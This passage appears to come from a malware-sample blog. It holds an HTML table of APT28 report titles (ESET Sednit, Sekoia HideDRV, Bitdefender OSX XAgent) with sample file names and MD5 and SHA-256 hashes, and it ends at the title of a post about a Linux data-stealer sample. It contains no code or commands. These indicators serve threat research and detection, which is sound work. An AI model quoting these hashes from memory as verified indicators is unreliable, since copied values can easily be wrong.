<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit A Mysterious Downloader</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E8ACA4B0CFE509783A34FF908287F98CAB968D9E.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">991ffdbf860756a4589164de26dd7ccf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">44e8d3ffa0989176e62b8462b3d14ad38ede5f859fd3d5eb387050f751080aa2</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit A Mysterious Downloader</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">EE788901CD804965F1CD00A0AFC713C8623430C4.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">93c589e9eaf3272bc0349d605b85c566</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f9c0303d07800ed7cba1394cd326bbe8f49c7c5e0e062be59a9749f6c51c6e69</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit A Mysterious Downloader</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">EE788901CD804965F1CD00A0AFC713C8623430C46.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">93c589e9eaf3272bc0349d605b85c566</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f9c0303d07800ed7cba1394cd326bbe8f49c7c5e0e062be59a9749f6c51c6e69</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit A Mysterious Downloader</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eset-sednit-part3.pdf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a7b4e01335aac544a12c6f88aab80cd9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2c7a60963b94b6fc924abdcb19da4d32f35c86cdfe2277b0081cd02c72435b48</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">015425010BD4CF9D511F7FCD0FC17FC17C23EEC1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c2a0344a2bbb29d9b56d378386afcbed</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">63d0b28114f6277b901132bc1cc1f541a594ee72f27d95653c54e1b73382a5f6</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0F7893E2647A7204DBF4B72E50678545573C3A10</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">35283c2e60a3cba6734f4f98c443d11f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">da43d39c749c121e99bba00ce809ca63794df3f704e7ad4077094abde4cf2a73</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">10686CC4E46CF3FFBDEB71DD565329A80787C439</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d7c471729bc124babf32945eb5706eb6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bc8fec92eee715e77c762693f1ae2bbcd6a3f3127f1226a847a8efdc272e2cbc</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">17661A04B4B150A6F70AFDABE3FD9839CC56BEE8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a579d53a1d29684de6d2c0cbabd525c5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6562e2ac60afa314cd463f771fcfb8be70f947f6e2b314b0c48187eebb33dd82</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">21835AAFE6D46840BB697E8B0D4AAC06DEC44F5B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">211b7100fd799e9eaabeb13cfa446231</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3d13f2e5b241168005425b15410556bcf26d04078da6b2ef42bc0c2be7654bf8</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2663EB655918C598BE1B2231D7C018D8350A0EF9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">540e4a7a28ca1514e53c2564993d8d87</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">31dd3e3c05fabbfeafbcb7f5616dba30bbb2b1fc77dba6f0250a2c3270c0dd6b</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2C86A6D6E9915A7F38D119888EDE60B38AB1D69D</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">56e011137b9678f1fcc54f9372198bae</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">69d5123a277dc1f618be5edcc95938a0df148c856d2e1231a07e2743bd683e01</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">351C3762BE9948D01034C69ACED97628099A90B0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">83cf67a5d2e68f9c00fbbe6d7d9203bf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">853dbbba09e2463c45c0ad913d15d67d15792d888f81b4908b2216859342aa04</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3956CFE34566BA8805F9B1FE0D2639606A404CD4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dffb22a1a6a757443ab403d61e760f0c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0356f5fa9907ea060a7d6964e65f019896deb1c7e303b7ba04da1458dc73a842</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4D5E923351F52A9D5C94EE90E6A00E6FCED733EF</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6159c094a663a171efd531b23a46716d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e00eaf295a28f5497dbb5cb8f647537b6e55dd66613505389c24e658d150972c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4FAE67D3988DA117608A7548D9029CADDBFB3EBF</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c6a80316ea97218df11e11125337233a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b0b3f0d6e6c593e2a2046833080574f98566c48a1eda865b2e110cd41bf31a31</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">51B0E3CD6360D50424BF776B3CD673DD45FD0F97</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">973e0c922eb07aad530d8a1de19c7755</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7c4101caf833aa9025fec4f04a637c049c929459ad3e4023ba27ac72bde7638d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">51E42368639D593D0AE2968BD2849DC20735C071</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dfc836e035cb6c43ce26ed870f61d7e8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">13468ebe5d47d57d62777043c80784cbf475fb2de1df4546a307807bd2376b45</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5C3E709517F41FEBF03109FA9D597F2CCC495956</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ac75fd7d79e64384b9c4053b37e5623f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0ac7b666814fd016b3d21d7812f4a272104511f90ca666fa13e9fb6cefa603c7</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">63D1D33E7418DAF200DC4660FC9A59492DDD50D9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2d4eaa0331abbc6d867f5f979b2c890d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b4f755c91c2790f4ab9bac4ee60725132323e13a2688f3d8939ae9ed4793d014</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">69D8CA2A02241A1F88A525617CF18971C99FB63B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ed601bbd4dd0e267afb0be840cb27c90</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4c52957270e63efa4b81a1c6551c706b82951f019b682219096e67182a727eab</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6FB3FD8C2580C84314B14510944700144A9E31DF</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f7ee38ca49cd4ae35824ce5738b6e587</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">63911ebce691c4b7c9582f37f63f6f439d2ce56e992bfbdcf812132512e753eb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">80DCA565807FA69A75A7DD278CEF1DAAEE34236E</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9863f1efc5274b3d449b5b7467819d28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0abda721c4f1ca626f5d8bd2ce186aa98b197ca68d53e81cf152c32230345071</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">842B0759B5796979877A2BAC82A33500163DED67</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">291af793767f5c5f2dc9c6d44f1bfb59</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f50791f9909c542e4abb5e3f760c896995758a832b0699c23ca54b579a9f2108</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8F99774926B2E0BF85E5147AACA8BBBBCC5F1D48</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c2988e3e4f70d5901b234ff1c1363dcc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">90C3B756B1BB849CBA80994D445E96A9872D0CF5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">21d63e99ed7dcd8baec74e6ce65c9ef3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dfa8a85e26c07a348a854130c652dcc6d29b203ee230ce0603c83d9f11bbcacc</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">99F927F97838EB47C1D59500EE9155ADB55B806A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">07c8a0a792a5447daf08ac32d1e283e8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8f0674cb85f28b2619a6e0ddc74ce71e92ce4c3162056ef65ff2777104d20109</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9FC43E32C887B7697BF6D6933E9859D29581EAD0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a3c757af9e7a9a60e235d08d54740fbc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bf28267386a010197a50b65f24e815aa527f2adbc53c609d2b2a4f999a639413</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A43EF43F3C3DB76A4A9CA8F40F7B2C89888F0399</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7c2b1de614a9664103b6ff7f3d73f83d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A5FCA59A2FAE0A12512336CA1B78F857AFC06445</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f1d3447a2bff56646478b0adb7d0451c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5a414a39851c4e22d4f9383211dfc080e16e2caffd90fa06dcbe51d11fdb0d6c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A857BCCF4CC5C15B60667ECD865112999E1E56BA</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0c334645a4c12513020aaabc3b78ef9f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e1b1143c0003c6905227df37d40aacbaecc2be8b9d86547650fe11bd47ca6989</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B4A515EF9DE037F18D96B9B0E48271180F5725B7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">afe09fb5a2b97f9e119f70292092604e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d93f22d46090bfc19ef51963a781eeb864390c66d9347e86e03bba25a1fc29c5</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B7788AF2EF073D7B3FB84086496896E7404E625E</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eda061c497ba73441994a30e36f55b1d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b1800cb1d4b755e05b0fca251b8c6da96bb85f8042f2d755b7f607cbeef58db8</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B8AABE12502F7D55AE332905ACEE80A10E3BC399</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">91381cd82cdd5f52bbc7b30d34cb8d83</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1a09ce8a9210d2530d6ce1d59bfae2ac617ac89558cdcdcac15392d176e70c8d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C1EAE93785C9CB917CFB260D3ABF6432C6FDAF4D</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">732fbf0a4ceb10e9a2254af59ae4f880</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6236a1bdd76ed90659a36f58b3e073623c34c6436d26413c8eca95f3266cc6fc</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C2E8C584D5401952AF4F1DB08CF4B6016874DDAC</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">078755389b98d17788eb5148e23109a6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">54c4ce98970a44f92be748ebda9fcfb7b30e08d98491e7735be6dd287189cea3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C345A85C01360F2833752A253A5094FF421FC839</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1219318522fa28252368f58f36820ac2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fbd5c2cf1c1f17402cc313fe3266b097a46e08f48b971570ef4667fbfd6b7301</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D3AA282B390A5CB29D15A97E0A046305038DBEFE</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">18efc091b431c39d3e59be445429a7bc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eae782130b06d95f3373ff7d5c0977a8019960bdf80614c1aa7e324dc350428a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D85E44D386315B0258847495BE1711450AC02D9F</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c4ffab85d84b494e1c450819a0e9c7db</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">500fa112a204b6abb365101013a17749ce83403c30cd37f7c6f94e693c2d492f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D9989A46D590EBC792F14AA6FEC30560DFE931B1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8b031fce1d0c38d6b4c68d52b2764c7e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4bcd11142d5b9f96730715905152a645a1bf487921dd65618c354281512a4ae7</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E5FB715A1C70402774EE2C518FB0E4E9CD3FDCFF</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">072c692783c67ea56da9de0a53a60d11</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c431ae04c79ade56e1902094acf51e5bf6b54d65363dfa239d59f31c27989fde</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E742B917D3EF41992E67389CD2FE2AAB0F9ACE5B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7764499bb1c4720d0f1d302f15be792c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">63047199037892f66dc083420e2fc60655a770756848c1f07adc2eb7d4a385d0</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ED9F3E5E889D281437B945993C6C2A80C60FDEDC</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2dfc90375a09459033d430d046216d22</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">261b0a5912965ea95b8ae02aae1e761a61f9ad3a9fb85ef781e62013d6a21368</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F024DBAB65198467C2B832DE9724CB70E24AF0DD</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7b1bfd7c1866040e8f618fe67b93bea5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">df47a939809f925475bc19804319652635848b8f346fb7dfd8c95c620595fe9f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F3D50C1F7D5F322C1A1F9A72FF122CAC990881EE</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">77089c094c0f2c15898ff0f021945148</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eb6620442c3ab327f3ccff1cc6d63d6ffe7729186f7e8ac1dbbbfddd971528f0</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F7608EF62A45822E9300D390064E667028B75DEA</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">75f71713a429589e87cf2656107d2bfc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b6fff95a74f9847f1a4282b38f148d80e4684d9c35d9ae79fad813d5dc0fd7a9</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_ESET_Sednit Approaching the Target</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eset-sednit-part1.pdf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bae0221feefb37e6b81f5ca893864743</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b31b27aa0808aea5b0e8823ecb07402c0c2bbf6818a22457e146c97f685162b4</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_Sekoia_Rootkit analysisUse case on HideDRV</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_Sekoia_Rootkit analysisUse case on HideDRV</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">83E54CB97644DE7084126E702937F8C3A2486A2F_fsflt.sys_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f8c8f6456c5a52ef24aa426e6b121685</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4bfe2216ee63657312af1b2507c8f2bf362fdf1d63c88faba397e880c2e39430</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2016-10_Sekoia_Rootkit analysisUse case on HideDRV</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9F3AB8779F2B81CAE83F62245AFB124266765939_fsflt.1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3430bf72d2694e428a73c84d5ac4a4b9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b1900cb7d1216d1dbc19b4c6c8567d48215148034a41913cc6e59958445aebde</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2017-02_Bitdefender_OSX_XAgent</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2017-02_Bitdefender_OSX_XAgent</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">70A1C4ED3A09A44A41D54C4FD4B409A5FC3159F6_XAgent_OSX</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4fe4b9560e99e33dabca553e2eeee510</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2a854997a44f4ba7e307d408ea2d9c1d84dde035c5dab830689aa45c5b5746ea</td></tr>
</tbody></table>
</div>
<div id="footer" style="border-bottom-color: initial; border-bottom-style: initial; border-image: initial; border-left-color: initial; border-left-style: initial; border-right-color: initial; border-right-style: initial; border-top-color: rgb(102, 102, 102); border-top-style: solid; border-width: 1px 0px 0px; color: #1c1c1c; font-family: Raleway, Helvetica, Arial, sans-serif; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 1em 0px 0px; padding: 1em; text-align: center; vertical-align: baseline;">
</div>
</div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-69049758781683860362016-08-24T00:18:00.000-04:002016-08-24T00:19:33.081-04:00Linux.Agent malware sample - data stealer<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
